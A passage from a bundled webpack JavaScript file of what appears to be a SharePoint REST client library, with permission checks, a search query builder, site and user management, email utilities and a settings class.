this; return this.getUserEffectivePermissions(loginName).then(function (perms) { return _this.hasPermissions(perms, permission); }); }; /** * Determines if the current user has the requested permissions * * @param permission The permission we wish to check */ QueryableSecurable.prototype.currentUserHasPermissions = function (permission) { var _this = this; return this.getCurrentUserEffectivePermissions().then(function (perms) { return _this.hasPermissions(perms, permission); }); }; /** * Taken from sp.js, checks the supplied permissions against the mask * * @param value The security principal's permissions on the given object * @param perm The permission checked against the value */ /* tslint:disable:no-bitwise */ QueryableSecurable.prototype.hasPermissions = function (value, perm) { if (!perm) { return true; } if (perm === types_1.PermissionKind.FullMask) { return (value.High & 32767) === 32767 && value.Low === 65535; } perm = perm - 1; var num = 1; if (perm >= 0 && perm < 32) { num = num << perm; return 0 !== (value.Low & num); } else if (perm >= 32 && perm < 64) { num = num << perm - 32; return 0 !== (value.High & num); } return false; }; return QueryableSecurable; }(queryable_1.QueryableInstance)); exports.QueryableSecurable = QueryableSecurable; /***/ }), /* 27 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; var __extends = (this && this.__extends) || (function () { var extendStatics = Object.setPrototypeOf || ({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) || function (d, b) { for (var p in b) if (b.hasOwnProperty(p)) d[p] = b[p]; }; return function (d, b) { extendStatics(d, b); function __() { this.constructor = d; } d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __()); }; })(); Object.defineProperty(exports, "__esModule", { value: true }); var queryable_1 = __webpack_require__(1); var util_1 = __webpack_require__(0); /** * Allows for the fluent construction of search queries */ var SearchQueryBuilder = (function () { function SearchQueryBuilder(queryText, _query) { if (queryText === void 0) { queryText = ""; } if (_query === void 0) { _query = {}; } this._query = _query; if (typeof queryText === "string" && queryText.length > 0) { this.extendQuery({ Querytext: queryText }); } } SearchQueryBuilder.create = function (queryText, queryTemplate) { if (queryText === void 0) { queryText = ""; } if (queryTemplate === void 0) { queryTemplate = {}; } return new SearchQueryBuilder(queryText, queryTemplate); }; SearchQueryBuilder.prototype.text = function (queryText) { return this.extendQuery({ Querytext: queryText }); }; SearchQueryBuilder.prototype.template = function (template) { return this.extendQuery({ QueryTemplate: template }); }; SearchQueryBuilder.prototype.sourceId = function (id) { return this.extendQuery({ SourceId: id }); }; Object.defineProperty(SearchQueryBuilder.prototype, "enableInterleaving", { get: function () { return this.extendQuery({ EnableInterleaving: true }); }, enumerable: true, configurable: true }); Object.defineProperty(SearchQueryBuilder.prototype, "enableStemming", { get: function () { return this.extendQuery({ EnableStemming: true }); }, enumerable: true, configurable: true }); Object.defineProperty(SearchQueryBuilder.prototype, "trimDuplicates", { get: function () { return this.extendQuery({ TrimDuplicates: true }); }, enumerable: true, configurable: true }); Object.defineProperty(SearchQueryBuilder.prototype, "enableNicknames", { get: function () { return this.extendQuery({ EnableNicknames: true }); }, enumerable: true, configurable: true }); Object.defineProperty(SearchQueryBuilder.prototype, "enableFql", { get: function () { return this.extendQuery({ EnableFql: true }); }, enumerable: true, configurable: true }); Object.defineProperty(SearchQueryBuilder.prototype, "enablePhonetic", { get: function () { return this.extendQuery({ EnablePhonetic: true }); }, enumerable: true, configurable: true }); Object.defineProperty(SearchQueryBuilder.prototype, "bypassResultTypes", { get: function () { return this.extendQuery({ BypassResultTypes: true }); }, enumerable: true, configurable: true }); Object.defineProperty(SearchQueryBuilder.prototype, "processBestBets", { get: function () { return this.extendQuery({ ProcessBestBets: true }); }, enumerable: true, configurable: true }); Object.defineProperty(SearchQueryBuilder.prototype, "enableQueryRules", { get: function () { return this.extendQuery({ EnableQueryRules: true }); }, enumerable: true, configurable: true }); Object.defineProperty(SearchQueryBuilder.prototype, "enableSorting", { get: function () { return this.extendQuery({ EnableSorting: true }); }, enumerable: true, configurable: true }); Object.defineProperty(SearchQueryBuilder.prototype, "generateBlockRankLog", { get: function () { return this.extendQuery({ GenerateBlockRankLog: true }); }, enumerable: true, configurable: true }); SearchQueryBuilder.prototype.rankingModelId = function (id) { return this.extendQuery({ RankingModelId: id }); }; SearchQueryBuilder.prototype.startRow = function (id) { return this.extendQuery({ StartRow: id }); }; SearchQueryBuilder.prototype.rowLimit = function (id) { return this.extendQuery({ RowLimit: id }); }; SearchQueryBuilder.prototype.rowsPerPage = function (id) { return this.extendQuery({ RowsPerPage: id }); }; SearchQueryBuilder.prototype.selectProperties = function () { var properties = []; for (var _i = 0; _i < arguments.length; _i++) { properties[_i] = arguments[_i]; } return this.extendQuery({ SelectProperties: properties }); }; SearchQueryBuilder.prototype.culture = function (culture) { return this.extendQuery({ Culture: culture }); }; SearchQueryBuilder.prototype.refinementFilters = function () { var filters = []; for (var _i = 0; _i < arguments.length; _i++) { filters[_i] = arguments[_i]; } return this.extendQuery({ RefinementFilters: filters }); }; SearchQueryBuilder.prototype.refiners = function (refiners) { return this.extendQuery({ Refiners: refiners }); }; SearchQueryBuilder.prototype.hiddenConstraints = function (constraints) { return this.extendQuery({ HiddenConstraints: constraints }); }; SearchQueryBuilder.prototype.sortList = function () { var sorts = []; for (var _i = 0; _i < arguments.length; _i++) { sorts[_i] = arguments[_i]; } return this.extendQuery({ SortList: sorts }); }; SearchQueryBuilder.prototype.timeout = function (milliseconds) { return this.extendQuery({ Timeout: milliseconds }); }; SearchQueryBuilder.prototype.hithighlightedProperties = function () { var properties = []; for (var _i = 0; _i < arguments.length; _i++) { properties[_i] = arguments[_i]; } return this.extendQuery({ HithighlightedProperties: properties }); }; SearchQueryBuilder.prototype.clientType = function (clientType) { return this.extendQuery({ ClientType: clientType }); }; SearchQueryBuilder.prototype.personalizationData = function (data) { return this.extendQuery({ PersonalizationData: data }); }; SearchQueryBuilder.prototype.resultsURL = function (url) { return this.extendQuery({ ResultsURL: url }); }; SearchQueryBuilder.prototype.queryTag = function () { var tags = []; for (var _i = 0; _i < arguments.length; _i++) { tags[_i] = arguments[_i]; } return this.extendQuery({ QueryTag: tags }); }; SearchQueryBuilder.prototype.properties = function () { var properties = []; for (var _i = 0; _i < arguments.length; _i++) { properties[_i] = arguments[_i]; } return this.extendQuery({ Properties: properties }); }; Object.defineProperty(SearchQueryBuilder.prototype, "processPersonalFavorites", { get: function () { return this.extendQuery({ ProcessPersonalFavorites: true }); }, enumerable: true, configurable: true }); SearchQueryBuilder.prototype.queryTemplatePropertiesUrl = function (url) { return this.extendQuery({ QueryTemplatePropertiesUrl: url }); }; SearchQueryBuilder.prototype.reorderingRules = function () { var rules = []; for (var _i = 0; _i < arguments.length; _i++) { rules[_i] = arguments[_i]; } return this.extendQuery({ ReorderingRules: rules }); }; SearchQueryBuilder.prototype.hitHighlightedMultivaluePropertyLimit = function (limit) { return this.extendQuery({ HitHighlightedMultivaluePropertyLimit: limit }); }; Object.defineProperty(SearchQueryBuilder.prototype, "enableOrderingHitHighlightedProperty", { get: function () { return this.extendQuery({ EnableOrderingHitHighlightedProperty: true }); }, enumerable: true, configurable: true }); SearchQueryBuilder.prototype.collapseSpecification = function (spec) { return this.extendQuery({ CollapseSpecification: spec }); }; SearchQueryBuilder.prototype.uiLanguage = function (lang) { return this.extendQuery({ UIlanguage: lang }); }; SearchQueryBuilder.prototype.desiredSnippetLength = function (len) { return this.extendQuery({ DesiredSnippetLength: len }); }; SearchQueryBuilder.prototype.maxSnippetLength = function (len) { return this.extendQuery({ MaxSnippetLength: len }); }; SearchQueryBuilder.prototype.summaryLength = function (len) { return this.extendQuery({ SummaryLength: len }); }; SearchQueryBuilder.prototype.toSearchQuery = function () { return this._query; }; SearchQueryBuilder.prototype.extendQuery = function (part) { this._query = util_1.Util.extend(this._query, part); return this; }; return SearchQueryBuilder; }()); exports.SearchQueryBuilder = SearchQueryBuilder; /** * Describes the search API * */ var Search = (function (_super) { __extends(Search, _super); /** * Creates a new instance of the Search class * * @param baseUrl The url for the search context * @param query The SearchQuery object to execute */ function Search(baseUrl, path) { if (path === void 0) { path = "_api/search/postquery"; } return _super.call(this, baseUrl, path) || this; } /** * ....... * @returns Promise */ Search.prototype.execute = function (query) { var _this = this; var formattedBody; formattedBody = query; if (formattedBody.SelectProperties) { formattedBody.SelectProperties = { results: query.SelectProperties }; } if (formattedBody.RefinementFilters) { formattedBody.RefinementFilters = { results: query.RefinementFilters }; } if (formattedBody.SortList) { formattedBody.SortList = { results: query.SortList }; } if (formattedBody.HithighlightedProperties) { formattedBody.HithighlightedProperties = { results: query.HithighlightedProperties }; } if (formattedBody.ReorderingRules) { formattedBody.ReorderingRules = { results: query.ReorderingRules }; } if (formattedBody.Properties) { formattedBody.Properties = { results: query.Properties }; } var postBody = JSON.stringify({ request: util_1.Util.extend({ "__metadata": { "type": "Microsoft.Office.Server.Search.REST.SearchRequest" }, }, formattedBody), }); return this.post({ body: postBody }).then(function (data) { return new SearchResults(data, _this.toUrl(), query); }); }; return Search; }(queryable_1.QueryableInstance)); exports.Search = Search; /** * Describes the SearchResults class, which returns the formatted and raw version of the query response */ var SearchResults = (function () { /** * Creates a new instance of the SearchResult class * */ function SearchResults(rawResponse, _url, _query, _raw, _primary) { if (_raw === void 0) { _raw = null; } if (_primary === void 0) { _primary = null; } this._url = _url; this._query = _query; this._raw = _raw; this._primary = _primary; this._raw = rawResponse.postquery ? rawResponse.postquery : rawResponse; } Object.defineProperty(SearchResults.prototype, "ElapsedTime", { get: function () { return this.RawSearchResults.ElapsedTime; }, enumerable: true, configurable: true }); Object.defineProperty(SearchResults.prototype, "RowCount", { get: function () { return this.RawSearchResults.PrimaryQueryResult.RelevantResults.RowCount; }, enumerable: true, configurable: true }); Object.defineProperty(SearchResults.prototype, "TotalRows", { get: function () { return this.RawSearchResults.PrimaryQueryResult.RelevantResults.TotalRows; }, enumerable: true, configurable: true }); Object.defineProperty(SearchResults.prototype, "TotalRowsIncludingDuplicates", { get: function () { return this.RawSearchResults.PrimaryQueryResult.RelevantResults.TotalRowsIncludingDuplicates; }, enumerable: true, configurable: true }); Object.defineProperty(SearchResults.prototype, "RawSearchResults", { get: function () { return this._raw; }, enumerable: true, configurable: true }); Object.defineProperty(SearchResults.prototype, "PrimarySearchResults", { get: function () { if (this._primary === null) { this._primary = this.formatSearchResults(this._raw.PrimaryQueryResult.RelevantResults.Table.Rows); } return this._primary; }, enumerable: true, configurable: true }); /** * Gets a page of results * * @param pageNumber Index of the page to return. Used to determine StartRow * @param pageSize Optional, items per page (default = 10) */ SearchResults.prototype.getPage = function (pageNumber, pageSize) { // if we got all the available rows we don't have another page if (this.TotalRows < this.RowCount) { return Promise.resolve(null); } // if pageSize is supplied, then we use that regardless of any previous values // otherwise get the previous RowLimit or default to 10 var rows = typeof pageSize !== "undefined" ? pageSize : this._query.hasOwnProperty("RowLimit") ? this._query.RowLimit : 10; var query = util_1.Util.extend(this._query, { RowLimit: rows, StartRow: rows * (pageNumber - 1) + 1, }); // we have reached the end if (query.StartRow > this.TotalRows) { return Promise.resolve(null); } var search = new Search(this._url, null); return search.execute(query); }; /** * Formats a search results array * * @param rawResults The array to process */ SearchResults.prototype.formatSearchResults = function (rawResults) { var results = new Array(); var tempResults = rawResults.results ? rawResults.results : rawResults; for (var _i = 0, tempResults_1 = tempResults; _i < tempResults_1.length; _i++) { var tempResult = tempResults_1[_i]; var cells = tempResult.Cells.results ? tempResult.Cells.results : tempResult.Cells; results.push(cells.reduce(function (res, cell) { Object.defineProperty(res, cell.Key, { configurable: false, enumerable: false, value: cell.Value, writable: false, }); return res; }, {})); } return results; }; return SearchResults; }()); exports.SearchResults = SearchResults; /** * defines the SortDirection enum */ var SortDirection; (function (SortDirection) { SortDirection[SortDirection["Ascending"] = 0] = "Ascending"; SortDirection[SortDirection["Descending"] = 1] = "Descending"; SortDirection[SortDirection["FQLFormula"] = 2] = "FQLFormula"; })(SortDirection = exports.SortDirection || (exports.SortDirection = {})); /** * defines the ReorderingRuleMatchType enum */ var ReorderingRuleMatchType; (function (ReorderingRuleMatchType) { ReorderingRuleMatchType[ReorderingRuleMatchType["ResultContainsKeyword"] = 0] = "ResultContainsKeyword"; ReorderingRuleMatchType[ReorderingRuleMatchType["TitleContainsKeyword"] = 1] = "TitleContainsKeyword"; ReorderingRuleMatchType[ReorderingRuleMatchType["TitleMatchesKeyword"] = 2] = "TitleMatchesKeyword"; ReorderingRuleMatchType[ReorderingRuleMatchType["UrlStartsWith"] = 3] = "UrlStartsWith"; ReorderingRuleMatchType[ReorderingRuleMatchType["UrlExactlyMatches"] = 4] = "UrlExactlyMatches"; ReorderingRuleMatchType[ReorderingRuleMatchType["ContentTypeIs"] = 5] = "ContentTypeIs"; ReorderingRuleMatchType[ReorderingRuleMatchType["FileExtensionMatches"] = 6] = "FileExtensionMatches"; ReorderingRuleMatchType[ReorderingRuleMatchType["ResultHasTag"] = 7] = "ResultHasTag"; ReorderingRuleMatchType[ReorderingRuleMatchType["ManualCondition"] = 8] = "ManualCondition"; })(ReorderingRuleMatchType = exports.ReorderingRuleMatchType || (exports.ReorderingRuleMatchType = {})); /** * Specifies the type value for the property */ var QueryPropertyValueType; (function (QueryPropertyValueType) { QueryPropertyValueType[QueryPropertyValueType["None"] = 0] = "None"; QueryPropertyValueType[QueryPropertyValueType["StringType"] = 1] = "StringType"; QueryPropertyValueType[QueryPropertyValueType["Int32TYpe"] = 2] = "Int32TYpe"; QueryPropertyValueType[QueryPropertyValueType["BooleanType"] = 3] = "BooleanType"; QueryPropertyValueType[QueryPropertyValueType["StringArrayType"] = 4] = "StringArrayType"; QueryPropertyValueType[QueryPropertyValueType["UnSupportedType"] = 5] = "UnSupportedType"; })(QueryPropertyValueType = exports.QueryPropertyValueType || (exports.QueryPropertyValueType = {})); var SearchBuiltInSourceId = (function () { function SearchBuiltInSourceId() { } return SearchBuiltInSourceId; }()); SearchBuiltInSourceId.Documents = "e7ec8cee-ded8-43c9-beb5-436b54b31e84"; SearchBuiltInSourceId.ItemsMatchingContentType = "5dc9f503-801e-4ced-8a2c-5d1237132419"; SearchBuiltInSourceId.ItemsMatchingTag = "e1327b9c-2b8c-4b23-99c9-3730cb29c3f7"; SearchBuiltInSourceId.ItemsRelatedToCurrentUser = "48fec42e-4a92-48ce-8363-c2703a40e67d"; SearchBuiltInSourceId.ItemsWithSameKeywordAsThisItem = "5c069288-1d17-454a-8ac6-9c642a065f48"; SearchBuiltInSourceId.LocalPeopleResults = "b09a7990-05ea-4af9-81ef-edfab16c4e31"; SearchBuiltInSourceId.LocalReportsAndDataResults = "203fba36-2763-4060-9931-911ac8c0583b"; SearchBuiltInSourceId.LocalSharePointResults = "8413cd39-2156-4e00-b54d-11efd9abdb89"; SearchBuiltInSourceId.LocalVideoResults = "78b793ce-7956-4669-aa3b-451fc5defebf"; SearchBuiltInSourceId.Pages = "5e34578e-4d08-4edc-8bf3-002acf3cdbcc"; SearchBuiltInSourceId.Pictures = "38403c8c-3975-41a8-826e-717f2d41568a"; SearchBuiltInSourceId.Popular = "97c71db1-58ce-4891-8b64-585bc2326c12"; SearchBuiltInSourceId.RecentlyChangedItems = "ba63bbae-fa9c-42c0-b027-9a878f16557c"; SearchBuiltInSourceId.RecommendedItems = "ec675252-14fa-4fbe-84dd-8d098ed74181"; SearchBuiltInSourceId.Wiki = "9479bf85-e257-4318-b5a8-81a180f5faa1"; exports.SearchBuiltInSourceId = SearchBuiltInSourceId; /***/ }), /* 28 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; var __extends = (this && this.__extends) || (function () { var extendStatics = Object.setPrototypeOf || ({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) || function (d, b) { for (var p in b) if (b.hasOwnProperty(p)) d[p] = b[p]; }; return function (d, b) { extendStatics(d, b); function __() { this.constructor = d; } d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __()); }; })(); Object.defineProperty(exports, "__esModule", { value: true }); var queryable_1 = __webpack_require__(1); var SearchSuggest = (function (_super) { __extends(SearchSuggest, _super); function SearchSuggest(baseUrl, path) { if (path === void 0) { path = "_api/search/suggest"; } return _super.call(this, baseUrl, path) || this; } SearchSuggest.prototype.execute = function (query) { this.mapQueryToQueryString(query); return this.get().then(function (response) { return new SearchSuggestResult(response); }); }; SearchSuggest.prototype.mapQueryToQueryString = function (query) { this.query.add("querytext", "'" + query.querytext + "'"); if (query.hasOwnProperty("count")) { this.query.add("inumberofquerysuggestions", query.count.toString()); } if (query.hasOwnProperty("personalCount")) { this.query.add("inumberofresultsuggestions", query.personalCount.toString()); } if (query.hasOwnProperty("preQuery")) { this.query.add("fprequerysuggestions", query.preQuery.toString()); } if (query.hasOwnProperty("hitHighlighting")) { this.query.add("fhithighlighting", query.hitHighlighting.toString()); } if (query.hasOwnProperty("capitalize")) { this.query.add("fcapitalizefirstletters", query.capitalize.toString()); } if (query.hasOwnProperty("culture")) { this.query.add("culture", query.culture.toString()); } if (query.hasOwnProperty("stemming")) { this.query.add("enablestemming", query.stemming.toString()); } if (query.hasOwnProperty("includePeople")) { this.query.add("showpeoplenamesuggestions", query.includePeople.toString()); } if (query.hasOwnProperty("queryRules")) { this.query.add("enablequeryrules", query.queryRules.toString()); } if (query.hasOwnProperty("prefixMatch")) { this.query.add("fprefixmatchallterms", query.prefixMatch.toString()); } }; return SearchSuggest; }(queryable_1.QueryableInstance)); exports.SearchSuggest = SearchSuggest; var SearchSuggestResult = (function () { function SearchSuggestResult(json) { if (json.hasOwnProperty("suggest")) { // verbose this.PeopleNames = json.suggest.PeopleNames.results; this.PersonalResults = json.suggest.PersonalResults.results; this.Queries = json.suggest.Queries.results; } else { this.PeopleNames = json.PeopleNames; this.PersonalResults = json.PersonalResults; this.Queries = json.Queries; } } return SearchSuggestResult; }()); exports.SearchSuggestResult = SearchSuggestResult; /***/ }), /* 29 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; var __extends = (this && this.__extends) || (function () { var extendStatics = Object.setPrototypeOf || ({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) || function (d, b) { for (var p in b) if (b.hasOwnProperty(p)) d[p] = b[p]; }; return function (d, b) { extendStatics(d, b); function __() { this.constructor = d; } d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __()); }; })(); Object.defineProperty(exports, "__esModule", { value: true }); var queryable_1 = __webpack_require__(1); var webs_1 = __webpack_require__(8); var usercustomactions_1 = __webpack_require__(19); var odata_1 = __webpack_require__(2); var features_1 = __webpack_require__(23); /** * Describes a site collection * */ var Site = (function (_super) { __extends(Site, _super); /** * Creates a new instance of the Site class * * @param baseUrl The url or Queryable which forms the parent of this site collection */ function Site(baseUrl, path) { if (path === void 0) { path = "_api/site"; } return _super.call(this, baseUrl, path) || this; } Object.defineProperty(Site.prototype, "rootWeb", { /** * Gets the root web of the site collection * */ get: function () { return new webs_1.Web(this, "rootweb"); }, enumerable: true, configurable: true }); Object.defineProperty(Site.prototype, "features", { /** * Gets the active features for this site collection * */ get: function () { return new features_1.Features(this); }, enumerable: true, configurable: true }); Object.defineProperty(Site.prototype, "userCustomActions", { /** * Gets all custom actions for this site collection * */ get: function () { return new usercustomactions_1.UserCustomActions(this); }, enumerable: true, configurable: true }); /** * Gets the context information for this site collection */ Site.prototype.getContextInfo = function () { var q = new Site(this.parentUrl, "_api/contextinfo"); return q.post().then(function (data) { if (data.hasOwnProperty("GetContextWebInformation")) { var info = data.GetContextWebInformation; info.SupportedSchemaVersions = info.SupportedSchemaVersions.results; return info; } else { return data; } }); }; /** * Gets the document libraries on a site. Static method. (SharePoint Online only) * * @param absoluteWebUrl The absolute url of the web whose document libraries should be returned */ Site.prototype.getDocumentLibraries = function (absoluteWebUrl) { var q = new queryable_1.Queryable("", "_api/sp.web.getdocumentlibraries(@v)"); q.query.add("@v", "'" + absoluteWebUrl + "'"); return q.get().then(function (data) { if (data.hasOwnProperty("GetDocumentLibraries")) { return data.GetDocumentLibraries; } else { return data; } }); }; /** * Gets the site url from a page url * * @param absolutePageUrl The absolute url of the page */ Site.prototype.getWebUrlFromPageUrl = function (absolutePageUrl) { var q = new queryable_1.Queryable("", "_api/sp.web.getweburlfrompageurl(@v)"); q.query.add("@v", "'" + absolutePageUrl + "'"); return q.get().then(function (data) { if (data.hasOwnProperty("GetWebUrlFromPageUrl")) { return data.GetWebUrlFromPageUrl; } else { return data; } }); }; /** * Creates a new batch for requests within the context of this site collection * */ Site.prototype.createBatch = function () { return new odata_1.ODataBatch(this.parentUrl); }; /** * Opens a web by id (using POST) * * @param webId The GUID id of the web to open */ Site.prototype.openWebById = function (webId) { return this.clone(Site, "openWebById('" + webId + "')", true).post().then(function (d) { return { data: d, web: webs_1.Web.fromUrl(odata_1.extractOdataId(d)), }; }); }; return Site; }(queryable_1.QueryableInstance)); exports.Site = Site; /***/ }), /* 30 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; var __extends = (this && this.__extends) || (function () { var extendStatics = Object.setPrototypeOf || ({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) || function (d, b) { for (var p in b) if (b.hasOwnProperty(p)) d[p] = b[p]; }; return function (d, b) { extendStatics(d, b); function __() { this.constructor = d; } d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __()); }; })(); Object.defineProperty(exports, "__esModule", { value: true }); var queryable_1 = __webpack_require__(1); var sitegroups_1 = __webpack_require__(18); var util_1 = __webpack_require__(0); /** * Describes a collection of all site collection users * */ var SiteUsers = (function (_super) { __extends(SiteUsers, _super); /** * Creates a new instance of the SiteUsers class * * @param baseUrl The url or Queryable which forms the parent of this user collection */ function SiteUsers(baseUrl, path) { if (path === void 0) { path = "siteusers"; } return _super.call(this, baseUrl, path) || this; } /** * Gets a user from the collection by email * * @param email The email address of the user to retrieve */ SiteUsers.prototype.getByEmail = function (email) { return new SiteUser(this, "getByEmail('" + email + "')"); }; /** * Gets a user from the collection by id * * @param id The id of the user to retrieve */ SiteUsers.prototype.getById = function (id) { return new SiteUser(this, "getById(" + id + ")"); }; /** * Gets a user from the collection by login name * * @param loginName The login name of the user to retrieve */ SiteUsers.prototype.getByLoginName = function (loginName) { var su = new SiteUser(this); su.concat("(@v)"); su.query.add("@v", "'" + encodeURIComponent(loginName) + "'"); return su; }; /** * Removes a user from the collection by id * * @param id The id of the user to remove */ SiteUsers.prototype.removeById = function (id) { return this.clone(SiteUsers, "removeById(" + id + ")", true).post(); }; /** * Removes a user from the collection by login name * * @param loginName The login name of the user to remove */ SiteUsers.prototype.removeByLoginName = function (loginName) { var o = this.clone(SiteUsers, "removeByLoginName(@v)", true); o.query.add("@v", "'" + encodeURIComponent(loginName) + "'"); return o.post(); }; /** * Adds a user to a group * * @param loginName The login name of the user to add to the group * */ SiteUsers.prototype.add = function (loginName) { var _this = this; return this.clone(SiteUsers, null, true).post({ body: JSON.stringify({ "__metadata": { "type": "SP.User" }, LoginName: loginName }), }).then(function () { return _this.getByLoginName(loginName); }); }; return SiteUsers; }(queryable_1.QueryableCollection)); exports.SiteUsers = SiteUsers; /** * Describes a single user * */ var SiteUser = (function (_super) { __extends(SiteUser, _super); function SiteUser() { return _super !== null && _super.apply(this, arguments) || this; } Object.defineProperty(SiteUser.prototype, "groups", { /** * Gets the groups for this user * */ get: function () { return new sitegroups_1.SiteGroups(this, "groups"); }, enumerable: true, configurable: true }); /** * Updates this user instance with the supplied properties * * @param properties A plain object of property names and values to update for the user */ SiteUser.prototype.update = function (properties) { var _this = this; var postBody = util_1.Util.extend({ "__metadata": { "type": "SP.User" } }, properties); return this.post({ body: JSON.stringify(postBody), headers: { "X-HTTP-Method": "MERGE", }, }).then(function (data) { return { data: data, user: _this, }; }); }; /** * Delete this user * */ SiteUser.prototype.delete = function () { return this.post({ headers: { "X-HTTP-Method": "DELETE", }, }); }; return SiteUser; }(queryable_1.QueryableInstance)); exports.SiteUser = SiteUser; /** * Represents the current user */ var CurrentUser = (function (_super) { __extends(CurrentUser, _super); function CurrentUser(baseUrl, path) { if (path === void 0) { path = "currentuser"; } return _super.call(this, baseUrl, path) || this; } return CurrentUser; }(queryable_1.QueryableInstance)); exports.CurrentUser = CurrentUser; /***/ }), /* 31 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; var __extends = (this && this.__extends) || (function () { var extendStatics = Object.setPrototypeOf || ({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) || function (d, b) { for (var p in b) if (b.hasOwnProperty(p)) d[p] = b[p]; }; return function (d, b) { extendStatics(d, b); function __() { this.constructor = d; } d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __()); }; })(); Object.defineProperty(exports, "__esModule", { value: true }); var queryable_1 = __webpack_require__(1); var util_1 = __webpack_require__(0); var files_1 = __webpack_require__(7); var odata_1 = __webpack_require__(2); /** * Allows for calling of the static SP.Utilities.Utility methods by supplying the method name */ var UtilityMethod = (function (_super) { __extends(UtilityMethod, _super); /** * Creates a new instance of the Utility method class * * @param baseUrl The parent url provider * @param methodName The static method name to call on the utility class */ function UtilityMethod(baseUrl, methodName) { return _super.call(this, UtilityMethod.getBaseUrl(baseUrl), "_api/SP.Utilities.Utility." + methodName) || this; } UtilityMethod.getBaseUrl = function (candidate) { if (typeof candidate === "string") { return candidate; } var c = candidate; var url = c.toUrl(); var index = url.indexOf("_api/"); if (index < 0) { return url; } return url.substr(0, index); }; UtilityMethod.prototype.excute = function (props) { return this.postAs({ body: JSON.stringify(props), }); }; /** * Clones this queryable into a new queryable instance of T * @param factory Constructor used to create the new instance * @param additionalPath Any additional path to include in the clone * @param includeBatch If true this instance's batch will be added to the cloned instance */ UtilityMethod.prototype.create = function (methodName, includeBatch) { var clone = new UtilityMethod(this.parentUrl, methodName); var target = this.query.get("@target"); if (target !== null) { clone.query.add("@target", target); } if (includeBatch && this.hasBatch) { clone = clone.inBatch(this.batch); } return clone; }; /** * Sends an email based on the supplied properties * * @param props The properties of the email to send */ UtilityMethod.prototype.sendEmail = function (props) { var params = { properties: { Body: props.Body, From: props.From, Subject: props.Subject, "__metadata": { "type": "SP.Utilities.EmailProperties" }, }, }; if (props.To && props.To.length > 0) { params.properties = util_1.Util.extend(params.properties, { To: { results: props.To }, }); } if (props.CC && props.CC.length > 0) { params.properties = util_1.Util.extend(params.properties, { CC: { results: props.CC }, }); } if (props.BCC && props.BCC.length > 0) { params.properties = util_1.Util.extend(params.properties, { BCC: { results: props.BCC }, }); } if (props.AdditionalHeaders) { params.properties = util_1.Util.extend(params.properties, { AdditionalHeaders: props.AdditionalHeaders, }); } return this.create("SendEmail", true).excute(params); }; UtilityMethod.prototype.getCurrentUserEmailAddresses = function () { return this.create("GetCurrentUserEmailAddresses", true).excute({}); }; UtilityMethod.prototype.resolvePrincipal = function (input, scopes, sources, inputIsEmailOnly, addToUserInfoList, matchUserInfoList) { if (matchUserInfoList === void 0) { matchUserInfoList = false; } var params = { addToUserInfoList: addToUserInfoList, input: input, inputIsEmailOnly: inputIsEmailOnly, matchUserInfoList: matchUserInfoList, scopes: scopes, sources: sources, }; return this.create("ResolvePrincipalInCurrentContext", true).excute(params); }; UtilityMethod.prototype.searchPrincipals = function (input, scopes, sources, groupName, maxCount) { var params = { groupName: groupName, input: input, maxCount: maxCount, scopes: scopes, sources: sources, }; return this.create("SearchPrincipalsUsingContextWeb", true).excute(params); }; UtilityMethod.prototype.createEmailBodyForInvitation = function (pageAddress) { var params = { pageAddress: pageAddress, }; return this.create("CreateEmailBodyForInvitation", true).excute(params); }; UtilityMethod.prototype.expandGroupsToPrincipals = function (inputs, maxCount) { if (maxCount === void 0) { maxCount = 30; } var params = { inputs: inputs, maxCount: maxCount, }; return this.create("ExpandGroupsToPrincipals", true).excute(params); }; UtilityMethod.prototype.createWikiPage = function (info) { return this.create("CreateWikiPageInContextWeb", true).excute({ parameters: info, }).then(function (r) { return { data: r, file: new files_1.File(odata_1.extractOdataId(r)), }; }); }; return UtilityMethod; }(queryable_1.Queryable)); exports.UtilityMethod = UtilityMethod; /***/ }), /* 32 */ /***/ (function(module, exports) { var g; // This works in non-strict mode g = (function() { return this; })(); try { // This works if eval is allowed (see CSP) g = g || Function("return this")() || (1,eval)("this"); } catch(e) { // This works if the window reference is available if(typeof window === "object") g = window; } // g can still be undefined, but nothing to do about it... // We return undefined, instead of nothing here, so it's // easier to handle this case. if(!global) { ...} module.exports = g; /***/ }), /* 33 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; Object.defineProperty(exports, "__esModule", { value: true }); var collections_1 = __webpack_require__(6); /** * Class used to manage the current application settings * */ var Settings = (function () { /** * Creates a new instance of the settings class * * @constructor */ function Settings() { this._settings = new collections_1.Dictionary(); } /** * Adds a new single setting, or overwrites a previous setting with the same key * * @param {string} key The key used to store this setting * @param {string} value The setting value to store */ Settings.prototype.add = function (key, value) { this._settings.add(key, value); }; /** * Adds a JSON value to the collection as a string, you must use getJSON to rehydrate the object when read * * @param {string} key The key used to store this setting * @param {any} value The setting value to store */ Settings.prototype.addJSON = function (key, value) { this._settings.add(key, JSON.stringify(value)); }; /** * Applies the supplied hash to the setting collection overwriting any existing value, or created new values * * @param {TypedHash<any>} hash The set of values to add */ Settings.prototype.apply = function (hash) { var _this = this; return new Promise(function (resolve, reject) { try { _this._settings.merge(hash); resolve(); } catch (e) { reject(e); } }); }; /** * Loads configuration settings into the collection from the supplied provider and returns a Promise * * @param {IConfigurationProvider} provider The provider from which we will load the settings */ Settings.prototype.load = function (provider) { var _this = this; return new Promise(function (resolve, reject) { provider.getConfiguration().then(function (value) { _this._settings.merge(value); resolve(); }).catch(function (reason) { reject(reason); }); }); }; /** * Gets a value from the configuration * * @param {string} key The key whose value we want to return. Returns null if the key does not exist * @return {string} string value from the configuration */ Settings.prototype.get = function (key) { return this._settings.get(key); }; /** * Gets a JSON value, rehydrating the stored string to the original object * * @param {string} key The key whose value we want to return. Returns null if the key does not exist 